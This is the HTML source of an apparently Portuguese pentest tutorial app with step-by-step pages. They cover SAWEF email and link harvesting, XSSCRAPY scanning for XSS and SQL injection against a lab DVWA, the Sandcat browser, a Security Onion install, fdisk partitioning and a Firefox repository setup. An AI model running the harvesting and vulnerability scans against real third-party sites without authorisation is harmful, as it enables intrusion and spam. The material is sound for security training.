<div class="tarea widget uib_w_140 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_140">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <strong>SAWEF</strong> é uma ferramenta que realiza alguma funções práticas em HTTP (GET, POST, User-Agent, Threads e Cookies), é possível obter toda a relação de E-mails ou Links de um determinado alvo, uma
ótima ferramenta para você adicionar em seu Kit de Pentest.</p>
<p><strong>Desenvolvedor:</strong>
<br>Danilo Vaz – UNK (@unknownantisec)
<br>E-mail | Site Oficial</p>
<p><strong>Projeto: </strong>github.com/danilovazb/sawef</p>
<p><strong>01 Passo</strong>
</p>
<p>Realize o download do <strong>sawef</strong>
</p>
<p>root@kali:/# git clone https://github.com/danilovazb/sawef</p>;
</div>
</div>
<div class="widget uib_w_141" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/06/sawef01.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_142 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_142">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Entre no diretório do <strong>sawef </strong>e liste os arquivos.</p>
<p>root@kali:/# cd sawef/</p>
<p>root@kali:/sawef# ls -l</p>
</div>
</div>
<div class="widget uib_w_143" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/06/sawef02.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_144 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_144">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>03 Passo</strong>
</p>
<p>Para obter uma lista de todos os <strong>Links </strong>do site alvo utilize o parâmetro –response links na execução do sawef.py</p>
<p>root@kali:/sawef# python sawef.py –url “http://www.100security.com.br” –response links</p>
</div>
</div>
<div class="widget uib_w_145" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/06/sawef03.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="widget uib_w_146" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/06/sawef04.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_147 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_147">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>04 Passo</strong>
</p>
<p>Para obter uma lista de todos os <strong>E-mails</strong> do site alvo utilize o parâmetro –response emails na execução do sawef.py</p>
<p>root@kali:/sawef# python sawef.py –url “http://www.unk-br.blogspot.com.br” –response emails</p>
</div>
</div>
<div class="widget uib_w_148" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/06/sawef05.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_149 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_149">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>05 Passo</strong>
</p>
<p>Para obter mais detalhes sobre um formulário explore os métodos GET e POST.</p>
<p>root@kali:/sawef# python sawef.py –url “http://www.100security.com.br/wargame/time.php” –method POST –response form</p>
</div>
</div>
<div class="widget uib_w_150" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/06/sawef06.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="pg_XSSCRAPY_Varredura">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_126" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_127 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="BT_"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_38_72">
<div class="tarea widget uib_w_129 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_129">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <strong>XSSCRAPY</strong> é uma ferramenta desenvolvida em Pyhton que realiza uma verredura completa no site alvo e exibe todos os links que estão passíveis a XSS e SQLi.</p>
<p><strong>Projeto:</strong> github.com/DanMcInerney/xsscrapy</p>
<p><strong>01 Passo</strong>
</p>
<p>Realize o download do <strong>xsscrapy</strong>
</p>
<p>root@kali:/# git clone <strong>https://github.com/DanMcInerney/xsscrapy</strong>
</p>
</div>
</div>
<div class="widget uib_w_130" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/xsscrapy01.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_131 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_131">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Entre no diretório do <strong>xsscrapy </strong>e liste os arquivos.</p>
<p>root@kali:/# cd <strong>xsscrapy/</strong>
</p>
<p>root@kali:/xsscrapy# <strong>ls -l</strong>
</p>
</div>
</div>
<div class="widget uib_w_132" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/xsscrapy02.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_133 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_133">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>03 Passo</strong>
</p>
<p>Execute o <strong>xsscrapy.py</strong> sobre o site alvo que deseja verificar</p>
<p>root@kali:/xsscrapy# ./xsscrapy.py -u<strong> http://10.10.10.150/dvwa</strong>
</p>
</div>
</div>
<div class="widget uib_w_134" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/xsscrapy03.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_135 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_135">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>04 Passo</strong>
</p>
<p>Será exibido um relatório com completo de todos os links avaliados e as vulnerabilidades encontradas.</p>
</div>
</div>
<div class="widget uib_w_136" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/xsscrapy04.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Sandcat_Browser">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_176" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_177 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="bt_browser"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_67_97">
<div class="tarea widget uib_w_178 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_178">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O<strong> Sandcat Browser</strong> é um navegador que traz características únicas que são úteis para pen-testers e desenvolvedores web, é construído em cima do Chromium e utiliza a linguagem de programação Lua
para fornecer extensões e suporte a scripts.</p>
<p><strong>Site: </strong>www.syhunt.com/sandcat</p>
<p><strong>Download: </strong>www.wuala.com/syhunt/tools/sandcat-5.0b1-pentester.exe</p>
<p><strong>Pen-Testers Tools:</strong> www.syhunt.com/sandcat/index.php?n=AddOns.Extensions#pentestertools</p>
<p>
<br>
<strong>01 Passo</strong>
</p>
<p>Apos o download execute o arquivo sandcat-5.0b1-pentester.exe e clique em Next ></p>
</div>
</div>
<div class="widget uib_w_179" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2014/08/sandcat01.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_180 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_180">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Aguarde o processo de instalação em seguida clique no botão Finish
<br>
<br>
</p>
<p><strong>03 Passo</strong>
</p>
<p>Abra o Sandcat Browser e explore seus recursos disponíveis.</p>
</div>
</div>
<div class="widget uib_w_181" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2014/08/sandcat15.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Security-onion">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_165" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_461 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="baclo_"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_68_28">
<div class="tarea widget uib_w_166 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_166">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <strong>Security Onion</strong> é uma distribuição Linux para detecção de intrusão, monitoramento de segurança de rede e gerenciamento de log, baseado no Ubuntu, suas principais ferramentas são: Snort, Suricata,
OSSEC, Sguil, Squert, Snorby, ELSA, Xplico e NetworkMiner.</p>
<p><strong>Instalação:</strong>
<br>Faça download da iso do security e do ubuntu na internet</p>
<p>Nessa breve apresentação a instalação será feito no VMWare Workstation com as seguintes configurações para a maquina virtual:</p>
<p>Versão – Ubuntu 64
<br>Memoria- 1 GB
<br>HD – 40 GB
<br>Adaptador de Rede: Duas Interfaces. Uma para o gerenciamento e outra para Sniffing da rede.</p>
<p>Com a maquina virtual já inicializada com a ISO, será exibido a tela abaixo. Agora vamos por passos:</p>
<p>1 – Executar o arquivo <strong>Setup </strong>que esta na área de trabalho.</p>
</div>
</div>
<div class="widget uib_w_167" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2014/10/1.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_168 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_168">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>2 – Configuração das interfaces de rede e logo após a reinicialização da maquina virtual.</p>
</div>
</div>
<div class="widget uib_w_169" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2014/10/2.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_170 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_170">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>3 – Novamente executar o arquivo <strong>Setup</strong>. Agora começa a instalação das ferramentas. Nesse exemplo será utilizado o “<strong>Quick Setup</strong>“.</p>
</div>
</div>
<div class="tarea widget uib_w_171 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_171">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>4 – A partir desse momento será necessário criar os usuários para acessar os sistemas. O processo de instalação é simples e bem intuitivo.</p>
<p>Screenshot do <strong>Snorby</strong> e <strong>Squert</strong>.</p>
</div>
</div>
<div class="widget uib_w_172" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2014/10/Snorby.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_173 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_173">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Detecções detalhadas do <strong>Snorby</strong>.</p>
</div>
</div>
<div class="widget uib_w_174" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2014/10/Squert.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Criando_Gere">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_195" data-uib="layout/header" data-ver="0">
<h2>LINUX</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_196 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_goh"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_50_81">
<div class="tarea widget uib_w_197 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_197">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<h3>Criando e Deletando Partições em Disco no Linux Com Fdisk </h3>
<p>Mais um guia bem prático para efetuar o gerenciamento de partições de forma rápida e simples utilizando o Fdisk para criar, dividir e excluir partições de disco no Linux. </p>
<p> </p>
<p> </p>
<p>Primeiro vamos listar todos os discos e partições presentes no servidor:</p>
<pre><code> # fdisk -l </code></pre>
<pre><code> [root@stageserver ~]# fdisk -l
Disk /dev/sda: 8589 MB, 8589934592 bytes, 16777216 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x000bd807
Dispositivo Boot Start End Blocks Id System
/dev/sda1 * 2048 1026047 512000 83 Linux
/dev/sda2 1026048 16777215 7875584 8e Linux LVM
Disk /dev/sdb: 8589 MB, 8589934592 bytes, 16777216 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</code></pre>
<p>
<br>Podemos notar que possuímos dois dispositivos no servidor, um deles o sda que é o HD principal com duas partições e o drive sdb onde iremos realizar nossos testes. vamos propor de primeiro momento que queremos dividir o
disco /dev/sdb em duas partes. Vamos utilizar o mesmo parâmetro do fdisk -l porém especificando somente o sdb para obter detalhes mais específicos do disco. Vamos nos atentar aos números de setores do disco, eles serão
importantes na hora de efetuar a divisão para criar as partições futuramente.</p>
<pre><code> # fdisk -l /dev/sdb </code></pre>
<pre><code> [root@stageserver ~]# fdisk -l /dev/sdb
Disk /dev/sdb: 8589 MB, 8589934592 bytes, <strong>16777216 sectors </strong>
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
[root@stageserver ~]#
</code></pre>
<p> </p>
<p>Criando partições de Disco </p>
<p>Podemos notar que disco possui praticamente 8 GB, vamos dividí-lo criando duas partições de 4 GB
<br>
</p>
<pre><code> fdisk /dev/sdb </code></pre>
<p>Agora na sequência vamos digitar "m" para visualizar o menu do fdisk.
<br>Tendo feito isso, vamos selecionar a opção para adicionar uma nova partição, no caso a opção "n"
<br>
</p>
<pre><code> [root@stageserver ~]# fdisk /dev/sdb
Welcome to fdisk (util-linux 2.23.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Device does not contain a recognized partition table
Building a new DOS disklabel with disk identifier 0x91022ffc.
Comando (m para ajuda): m
Comando - ação
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
g create a new empty GPT partition table
G create an IRIX (SGI) partition table
l list known partition types
m print this menu
<strong> n add a new partition </strong>
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Comando (m para ajuda): n
</code></pre>
<p>
<br>Na sequência, vamos criar uma primeira partição primária, selecionando o parâmetro "p", e deixando o numero da partição se setor primário como default de primeiro momento, uma vez que iremos criar somente a primeira partição,
deveremos nos atentar a esses parâmetros da próxima vez quando criarmos a segunda.
<br>
<br>O last sector é um caso a parte, notamos que neste caso o disco possui exatos 16777215 setores no disco. No caso, como queremos dividir o mesmo ao meio vamos fazer a divisão deste numero por 2, resultando em 8388607.5,
porém arrendondando ganhamos um setorzinho a mais, iremos trabalhar com a ultimo setor <strong>8388608</strong>
<br>
</p>
<pre><code> Comando (m para ajuda): n
Partition type:
p primary (0 primary, 0 extended, 4 free)
e extended
Select (default p): p
Número da partição (1-4, default 1): 1
Primeiro sector (2048-16777215, default 2048):
Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-16777215, default 16777215): <strong>8388608</strong>
<strong>Partition 1 of type Linux and of size 4 GiB is set</strong>
Comando (m para ajuda):
</code></pre>
<p>
<br>Criamos a partição com 4 Gb dividindo o número dos setores no meio. Vamos criar a segunda pressionando a opção "m" novamente e repentido os passos anteriores até a hora da divisão, neste ultimo caso deixaremos todos os
outros parâmetros como Default, pois o fdisk irá identificar como o primeiro setor disponível o ultimo não utilizado pela primeira partição que criamos. Neste caso, somente neste caso deixaremos todas as opções por default</p>
<pre><code> Comando (m para ajuda): <strong>m </strong>
Comando - ação
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
g create a new empty GPT partition table
G create an IRIX (SGI) partition table
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Comando (m para ajuda): <strong>n </strong>
Partition type:
p primary (1 primary, 0 extended, 3 free)
e extended
Select (default p): p
Número da partição (2-4, default 2):
Primeiro sector (8388609-16777215, default 8390656):
Using default value 8390656
Last sector, +sectors or +size{K,M,G} (8390656-16777215, default 16777215):
Using default value 16777215
Partition 2 of type Linux and of size 4 GiB is set
Comando (m para ajuda):
</code></pre>
<p>
<br>
<br>Agora temos dois projetos de partições no FDISK, porém os mesmos ainda não estão criados. Precisamos escrever essas mudanças no disco antes de sair do console do FDISK para não perder essas alteraç]ões.
<br>No caso pressione "<strong>m</strong>" novamente para acessar as opções e logo em seguida selecione a opção "<strong>w</strong>" para escrever as mudanças e sair .</p>
<pre><code> Comando (m para ajuda): <strong>m</strong>
Comando - ação
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
g create a new empty GPT partition table
G create an IRIX (SGI) partition table
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Comando (m para ajuda): <strong>w </strong>
<strong> A tabela de partições foi alterada! </strong>
Chamando ioctl() para reler tabela de partições.
Sincronizando discos.
[root@stageserver ~]#
</code></pre>
<p>Agora vamos listar os discos existentes para ver as modificações que fizemos</p>
<pre><code> [root@stageserver ~]# fdisk -l
Disk /dev/sda: 8589 MB, 8589934592 bytes, 16777216 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x000bd807
Dispositivo Boot Start End Blocks Id System
/dev/sda1 * 2048 1026047 512000 83 Linux
/dev/sda2 1026048 16777215 7875584 8e Linux LVM
Disk /dev/sdb: 8589 MB, 8589934592 bytes, 16777216 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x91022ffc
Dispositivo Boot Start End Blocks Id System
/<strong>dev/sdb1 2048 8388608 4193280+ 83 Linux
/dev/sdb2 8390656 16777215 4193280 83 Linux </strong>
</code></pre>
<p>
<br>Note que agora temos duas partições no disco sdb, ficando identificadas como sdb1 e sdb2. Agora vamos excluir a partição sdb2. Para realizar este passo iremos simplesmente realizar os mesmos passos, porém na hora de escolher
a opção no menu, devemos selecionar a opção "d" para deletar. Logo em seguida a o numero da partição a ser excluída.
<br>
</p>
<pre><code> # fdisk /dev/sdb </code></pre>
<pre><code> [root@stageserver ~]# fdisk /dev/sdb
Welcome to fdisk (util-linux 2.23.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Comando (m para ajuda): m
Comando - ação
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
g create a new empty GPT partition table
G create an IRIX (SGI) partition table
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Comando (m para ajuda): d
Número da partição (1,2, default 2): 2
Partition 2 is deleted
Comando (m para ajuda):
</code></pre>
<p>
<br>
<br>Formatando partições de disco
<br>
<br>O Fdisk também suporta diversos tipos de Filesystems existentes, podemos listar todos como o parâmetro "<strong>l"</strong> no menu.
<br>
</p>
<pre><code> [root@stageserver ~]# fdisk /dev/sdb
Welcome to fdisk (util-linux 2.23.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Comando (m para ajuda): m
Comando - ação
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
g create a new empty GPT partition table
G create an IRIX (SGI) partition table
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Comando (m para ajuda): l
0 Vazia 24 DOS NEC 81 Linux antigo/Mi bf Solaris
1 FAT12 27 Hidden NTFS Win 82 Linux swap / So c1 DRDOS/sec (FAT1
2 root XENIX 39 Plan 9 83 Linux c4 DRDOS/sec (FAT1
3 usr XENIX 3c Recuperação do 84 Unidade C: OS/2 c6 DRDOS/sec (FAT1
4 FAT16 < 32 M 40 Venix 80286 85 Estendida Linux c7 Syrinx
5 Estendida 41 Boot PReP PPC 86 Conjunto de vol da Dados Não-FS
6 FAT16 42 SFS 87 Conjunto de vol db CP/M / CTOS / .
7 HPFS/NTFS/exFAT 4d QNX4.x 88 Linux plaintext de Utilitário Dell
8 AIX 4e QNX4.x 2ª parte 8e Linux LVM df BootIt
9 AIX inicializáv 4f QNX4.x 3ª parte 93 Amoeba e1 Acesso DOS
a Gerenc. Inicial 50 DM OnTrack 94 Amoeba BBT e3 DOS R/O
b W95 FAT32 51 DM6 OnTrack Aux 9f BSD/OS e4 SpeedStor
c W95 FAT32 (LBA) 52 CP/M a0 Hibernação IBM eb sist. arq. BeOS
e W95 FAT16 (LBA) 53 DM6 OnTrack Aux a5 FreeBSD ee GPT
f W95 Ext'd (LBA) 54 DM6 OnTrack a6 OpenBSD ef EFI (FAT-12/16/
10 OPUS 55 EZ-Drive a7 NeXTSTEP f0 Linux/PA-RISC b
11 FAT12 Escondida 56 Golden Bow a8 Darwin UFS f1 SpeedStor
12 Diagnóstico Com 5c Edisk Priam a9 NetBSD f4 SpeedStor
14 FAT16 Escondida 61 SpeedStor ab Darwin boot f2 DOS secundário
16 FAT16 Escondida 63 GNU HURD ou Sys af HFS / HFS+ fb VMware VMFS
17 HPFS ou NTFS Es 64 Novell Netware b7 sist. arq. BSDI fc VMware VMKCORE
18 AST SmartSleep 65 Novell Netware b8 permuta BSDI fd Detecção automá
1b Hidden W95 FAT3 70 Multi-Boot Disk bb Boot Wizard hid fe LANstep
1c Hidden W95 FAT3 75 PC/IX be Solaris boot ff BBT
1e Hidden W95 FAT1 80 Minix antigo
Comando (m para ajuda):
</code></pre>
<p>
<br>Podemos ver que o Fdisk possui uma gama de filesystems. Vamos agora definir o parâmetro "t" para definir o tipo de partição que queremos criar e em seguida "L" para listar em hex code. Neste caso irei realizar com o número
82, equivalente ao Linux Swap. Logo após é só criar a partição como explicado logo acima:
<br>
</p>
<pre><code> Comando (m para ajuda): <strong>t </strong>
Número da partição (1,2, default 2): 2
Hex code (type L to list all codes):<strong> L </strong>
0 Vazia 24 DOS NEC 81 Linux antigo/Mi bf Solaris
1 FAT12 27 Hidden NTFS Win 82 Linux swap / So c1 DRDOS/sec (FAT1
2 root XENIX 39 Plan 9 83 Linux c4 DRDOS/sec (FAT1
3 usr XENIX 3c Recuperação do 84 Unidade C: OS/2 c6 DRDOS/sec (FAT1
4 FAT16 < 32 M 40 Venix 80286 85 Estendida Linux c7 Syrinx
5 Estendida 41 Boot PReP PPC 86 Conjunto de vol da Dados Não-FS
6 FAT16 42 SFS 87 Conjunto de vol db CP/M / CTOS / .
7 HPFS/NTFS/exFAT 4d QNX4.x 88 Linux plaintext de Utilitário Dell
8 AIX 4e QNX4.x 2ª parte 8e Linux LVM df BootIt
9 AIX inicializáv 4f QNX4.x 3ª parte 93 Amoeba e1 Acesso DOS
a Gerenc. Inicial 50 DM OnTrack 94 Amoeba BBT e3 DOS R/O
b W95 FAT32 51 DM6 OnTrack Aux 9f BSD/OS e4 SpeedStor
c W95 FAT32 (LBA) 52 CP/M a0 Hibernação IBM eb sist. arq. BeOS
e W95 FAT16 (LBA) 53 DM6 OnTrack Aux a5 FreeBSD ee GPT
f W95 Ext'd (LBA) 54 DM6 OnTrack a6 OpenBSD ef EFI (FAT-12/16/
10 OPUS 55 EZ-Drive a7 NeXTSTEP f0 Linux/PA-RISC b
11 FAT12 Escondida 56 Golden Bow a8 Darwin UFS f1 SpeedStor
12 Diagnóstico Com 5c Edisk Priam a9 NetBSD f4 SpeedStor
14 FAT16 Escondida 61 SpeedStor ab Darwin boot f2 DOS secundário
16 FAT16 Escondida 63 GNU HURD ou Sys af HFS / HFS+ fb VMware VMFS
17 HPFS ou NTFS Es 64 Novell Netware b7 sist. arq. BSDI fc VMware VMKCORE
18 AST SmartSleep 65 Novell Netware b8 permuta BSDI fd Detecção automá
1b Hidden W95 FAT3 70 Multi-Boot Disk bb Boot Wizard hid fe LANstep
1c Hidden W95 FAT3 75 PC/IX be Solaris boot ff BBT
1e Hidden W95 FAT1 80 Minix antigo
Hex code (type L to list all codes): 82
<strong> Changed type of partition 'Linux' to 'Linux swap / Solaris' </strong>
Comando (m para ajuda): </code></pre>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="uib_page_2">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_192" data-uib="layout/header" data-ver="0">
<h2>LINUX</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_193 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_backtwo"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_51_61">
<div class="tarea widget uib_w_194 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_194">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Desinstalando o Iceweasel</p>
<p>Se você estiver utilizando o Debian ou o Kali com o Iceweasel instalado, é possível que você não consiga instalar o Mozilla Firefox por conta do conflito de versões, pois o sistema intende que a versão Open Source do Firefox
é a do Firefox real.
<br>
<br>Para desinstalar o Iceweasel basta:</p>
<pre><code> # sudo apt-get autoremove iceweasel
</code></pre>
<p>
<br>
</p>
<p>Instalando o Repositório Estável </p>
<p>Edite o arquivo de sources do apt e adicione o repositório: </p>
<pre><code> # vim /etc/apt/sources.list
</code></pre>
<p>E adicione o repositório:</p>
<pre><code> deb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main
</code></pre>
<p>Agora, adicione a chave do repositório e atualize:</p>
<pre><code> # sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 </code></pre>
<pre><code> # sudo apt-get update
</code></pre>
<p>
<br>Instalando o Mozilla Firefox</p>
<p>Para instalar o Mozilla Build do Firefox basta solicitá-lo para o apt:</p>
<pre><code> # sudo apt-get install firefox-mozilla-build
</code></pre>
<p> </p>
<p>Instalando o Mozilla Thunderbird</p>
<pre><code> # sudo apt-get install thunderbird-mozilla-build
</code></pre>
<p>
<br>Instalando o SeaMonkey</p>
<pre><code> # sudo apt-get install seamonkey-mozilla-build </code></pre>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="VHostCreator_">
<div class="upage-outer">
